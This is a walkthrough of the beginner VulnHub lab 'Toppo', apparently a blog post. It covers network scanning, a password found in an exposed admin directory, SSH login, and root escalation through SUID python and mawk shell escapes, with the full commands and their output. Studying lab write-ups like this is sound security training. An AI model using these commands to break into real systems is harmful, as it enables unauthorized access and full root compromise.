Walkthrough – Toppo

Toppo is a boot2root aimed at beginners.  You can download it from vulnhub here.

Scanning

First step is to find our target’s IP address. We’ll accomplish this via arp-scan

arp-scan -l
[...snip...]
10.10.10.22 00:0c:29:54:8d:88 VMware, Inc.
[...snip...]

Our target is located at 10.10.10.22. The next step is to determine what ports are open, using nmap.

nmap -p 1-65535 -T4 -A -v 10.10.10.22
[...snip...]
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind
[...snip...]

Port :22

OpenSSH 6.7p1 is running on port 22.  Our nmap scan also tells us that it is likely a Debian version.

Port :80

Apache httpd 2.4.10 is running on port 8.  Nmap states that it is likely a Debian version as well, again indicating that the target is likely a Debian box.

Vulnerability Analysis

SSH

A quick scan of searchsploit doesn’t return any exploits for our version of OpenSSH.  In theory, we could still try to brute force our way in, but without even knowing a username, this is unlikely to succeed.

HTTP

There don’t appear to be any useful exploits for our version of Apache, time to take a look at the website that is running.

It appears to be a Bootstrap CMS site.  This is my first time encountering them, and after a quick Google search, it doesn’t appear like there are any standard login portals like you might have with a WordPress site (wp-admin).  Nothing yielded by searchsploit either.  There’s also no robots.txt file!

Next step, nikto.

root@kali:~# nikto --host=http://10.10.10.22
[...snip...]
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
[...snip...]

/admin/ is indeed interesting.  It has directory indexing, meaning you can view all of the files located at that directory.  It contains one file titled notes.txt

Opening that file yields a lovely little note to self, with what appears to be a password!

At this point I spent a lot of time searching again for some sort of login page for management of the website, but had no luck.  That’s when I remembered that SSH is accessible.  It couldn’t be that easy…

Exploitation

SSH Login

Taking a guess that if the user’s password is 12345ted123, then maybe his username is ted, I tried to log in via SSH.

root@kali:~# sshpass -p 12345ted123 ssh ted@10.10.10.22

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jul 23 14:26:06 2018 from 10.10.10.23
ted@Toppo:~$

Reconnaissance

Sudo

It’s been simple enough so far, maybe ted is able to execute commands with sudo?  Let’s check:

ted@Toppo:~$ sudo -l
-bash: sudo: command not found

So sudo isn’t even available… interesting.

SUID

The suid bit in linux file permissions basically allows a user to execute a command as the owner of that file, rather than as your current user.  An example of this would be the passwd command.  Passwd modifies system files like /etc/passwd and /etc/shadow, something that requires root privileges.  That means that in order for a user to change their password, they need to be able to execute passwd as root.  Sometimes, files will have the suid bit set that can allow you to execute arbitrary commands, serving as a great privilege escalation vector.  For this reason, let’s search for files with SUID bit set, and see if there’s anything interesting.

The command that we will use is below:

find / -perm +4000 -user root -type f -print 2>/dev/null

The +4000 will search for files with SUID set, -user root only shows those owned by root.  If we are trying to escalate our privileges, we aren’t currently interested in running commands as users other than root. -type f will only return files, and not directories.  -print will output the entire path of matches, instead of just the file name.  And finally, 2>/dev/null redirects stderr to the bit bucket so we don’t have to see any errors about not having permission to search various folders.

The results are below:

/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd

There are two items that stand out, python and mawk.  Both of these are interpreters that can execute python and awk code, respectively.

Vulnerability Analysis

Python

Python can execute linux commands in a number of ways.  My method of choice is via pty.spawn, as shown below:

import pty
pty.spawn("/bin/sh")

The above lines will open a new sh shell. In order to execute that python code from the terminal, taking advantage of our suid bit on /usr/bin/python2.7, we’d execute the following:

ted@Toppo:~$ python -c 'import pty;pty.spawn("/bin/sh")'

Mawk

I believe that there are a number of ways that mawk could execute linux commands, the only one that I am familiar with is below:

mawk 'BEGIN {system("/bin/sh")}'

Exploitation

Both of the above two vulnerabilities should be usable to escalate to root privileges.  We’ll next test each of them

Python

ted@Toppo:~$ python -c 'import pty;pty.spawn("/bin/sh")'
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# hostname
Toppo
# cat /root/flag.txt
_________
| _ _ |
|_/ | | \_|.--. _ .--. _ .--. .--.
| | / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \
_| |_ | \__. | | \__/ | | \__/ || \__. |
|_____| '.__.' | ;.__/ | ;.__/ '.__.'
[__| [__|

Congratulations ! there is your flag : 0wnedlab{p4[censored]}

#

Without unispace fonts, it doesn’t turn out well, but that is supposed to say Toppo…

Mawk

ted@Toppo:~$ mawk 'BEGIN {system("/bin/sh")}'
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# hostname
Toppo
# cat /root/flag.txt
_________
| _ _ |
|_/ | | \_|.--. _ .--. _ .--. .--.
| | / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \
_| |_ | \__. | | \__/ | | \__/ || \__. |
|_____| '.__.' | ;.__/ | ;.__/ '.__.'
[__| [__|

Congratulations ! there is your flag : 0wnedlab{p4[censored]}

#

And there you have it, root!  And two different ways!  I recommend filing that suid search one-liner for future use, it can be extremely helpful if you’re stuck looking for priv esc vectors.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.